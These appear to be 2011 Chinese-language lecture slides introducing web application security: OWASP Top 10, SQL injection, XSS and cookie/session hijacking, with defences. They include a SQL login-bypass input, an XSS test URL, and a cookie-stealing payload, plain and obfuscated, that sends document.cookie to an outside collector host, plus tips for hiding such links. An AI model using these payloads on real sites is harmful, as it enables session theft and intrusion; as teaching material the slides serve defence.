中央大學電子計算機中心「多媒體與網路應用」資訊推廣課程

網頁應用程式的安全入門

日期 : 2011/03/27講師 : 資工三 張竟             cwebb [dot] tw [at] gmail [dot] com

Agenda

嘴砲OWSAP Top 10

SQL injection

XSS

cookie & session

2

Agenda

嘴砲OWSAP Top 10

SQL injection

XSS

cookie & session

3

不要做壞事！

4

不要被抓到！

5

不要被抓到！

6

不要說我教的

7

Agenda

嘴砲OWSAP Top 10

SQL injection

XSS

cookie & session

8

網頁安全？

早年  vs 現代靜態  vs 動態有程式 就有漏洞 !

9

ways to attack

OS

web server

web application

10

attack scenariosattack web server gain privilege steal informations to attack users

attack other user steal informations execute other attacks

may be composite

11

Agenda

嘴砲OWSAP Top 10

SQL injection

XSS

cookie & session

12

13

OWASP Top 10 - 2010

A1: Injection

A2: Cross-Site Scripting (XSS)

A3: Broken Authentication and Session Management

A4: Insecure Direct Object References

A5: Cross-Site Request Forgery (CSRF)

14

OWASP Top 10 - 2010

A6: Security Misconfiguration

A7: Insecure Cryptographic Storage

A8: Failure to Restrict URL Access

A9: Insufficient Transport Layer Protection

A10: Unvalidated Redirects and Forwards

15

OWASP Top 10 - 2010

A1: Injection

A2: Cross-Site Scripting (XSS)

A3: Broken Authentication and Session Management

A4: Insecure Direct Object References

A5: Cross-Site Request Forgery (CSRF)

16

OWASP Top 10 - 2010

A6: Security Misconfiguration

A7: Insecure Cryptographic Storage

A8: Failure to Restrict URL Access

A9: Insufficient Transport Layer Protection

A10: Unvalidated Redirects and Forwards

17

Agenda

嘴砲OWSAP Top 10

SQL injection

XSS

cookie & session

18

Injections

駭客的填空遊戲where can attacker inject? database (MySQL, MS SQL, PostgreSQL ... ) no-sql Directory Service (LDAP) system command!!

19

how SQL works in web

login page for example

client web server

sql server

request whit

id and pwd

sele

ct fr

om a

ccou

nt

whe

re `id

`=id

and

`pwd`

=pw

d

retu

rn re

sult

return login

success/failed

20

Why SQL?

廣大使用儲存大量的網站資料injection friendly

21

how injections work?

以 MySQL為例子$query = “select from account where `id`=’$id’ and `pwd`=’$pwd’

$id=’ or 1=1 -- > select from account where `id`=’’ -- ....

22

attack skills

union

blind attack

23

影響

資料被偷 /被改獲得網站權限整個網站被拿下#

24

how to defense

safe API

過濾逃脫字元 不要直接把使用者輸入加入 query

找程式掃描弱點

25

Practice

26

Agenda

嘴砲OWSAP Top 10

SQL injection

XSS

cookie & session

27

XSS

Cross Site Scripting

在別人的網站上寫程式！ 

28

background knowledge

HTTP GET

HTTP POST

29

how to attack

attack using POST/GET

the “scripting”

in the server

strange url

30

how to attack

javascript

<iframe> / <image>

31

example<body> <? echo “Hello ”.$_GET[‘id’].”; ?></body>

http://goodsite.com/?id=<script>alert(“i’m Orange”)</script>

32

what may happened?

take you to bad site

send your information to attacker

Just For Fun!

33

Just For Fun Samy

MySpace XSS attack

Samy is my hero!

Infection

34

Big Site also XSSable

MySpace

Facebook

twitter

Plurk

...

35

how to defense

for server

該逃的還是要逃

找程式掃描弱點

for user

看到奇怪連結要警覺

瀏覽器  / 防毒軟體

36

practice

37

Agenda

嘴砲OWSAP Top 10

SQL injection

XSS

cookie & session

38

background knowledge

cookie

session

A cookie is a piece of text stored by a user's web browser.A cookie can be used for authentication, storing site preferences, shopping cart contents, the identifier for a server-based session, or anything else that can be accomplished through storing text data.The session information is stored on the web server using the session identifier (session ID) generated as a result of the first (sometimes the first authenticated) request from the end user running a web browser. The "storage" of session IDs and the associated session data (user name, account number, etc.) on the web server is accomplished using a variety of techniques including, but not limited to: local memory, flat files, and databases. 39

40

41

如果偷到了 cookie可以 ....

42

how to steal it?

43

44

把 cookie送到雲端 !

用 GET / POST方式讓網頁把cookie送走<img> / <iframe> ex: ["<img src='http://in1.ncu.cc/~975002063/keke/t.php?t=",document.cookie," >"].join(

sever side is simplejust keep the cookie

45

哪個白痴會點這鬼連結

http://example.com/?samname=%22%3E%3Cscript%3Edocument.write%28[String.fromCharCode%2860,105,109,103,32,115,114,99,61,39,104,116,116,112,58,47,47,105,110,49,46,110,99,117,46,99,99,47,126,57,55,53,48,48,50,48,54,51,47,107,101,107,101,47,116,46,112,104,112,63,116,61,34%29,document.cookie,String.fromCharCode%2834,39,62%29].join%28%29%29;%3C/script%3E%3C%22

46

hidden

有種東西叫短網址      (tinyurl.com / 0rz.tw / goo.gl / bit.ly)

塞進別的網頁裡       (ex: iframe長寬設 0 或 1)

ugly url EVERY WHEREhttps://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1eic6yu9oa4y3&scc=1&ltmpl=default&ltmplcache=2https://login.yahoo.com/config/login?.intl=tw&.pd=c%3d7pP3Kh2p2e4XklntZWWfDLAC8w--&.done=https://tw.login.yahoo.com/cgi-bin/kcookie.cgi/www/http%3a//tw.yahoo.com&rl=1

47

防範

鎖定 user agent / header

綁 IP

* 不要被攻擊成功 *

48

鎖定 user agent / header

if (isset($_SESSION['HTTP_USER_AGENT'])){ if ($_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT'])) { exit(); }}else{ $_SESSION['HTTP_USER_AGENT'] = md5($_SERVER['HTTP_USER_AGENT']);}

但是 ... 當你偷的到 cookie 會拿不到header 嗎 ?

49

Practice

50

Q&A?

51

end52

Reference

53

http://www.owasp.org/http://en.wikipedia.org/http://goo.gl/cA3ahttp://goo.gl/IwGbXhttp://goo.gl/uQ4I1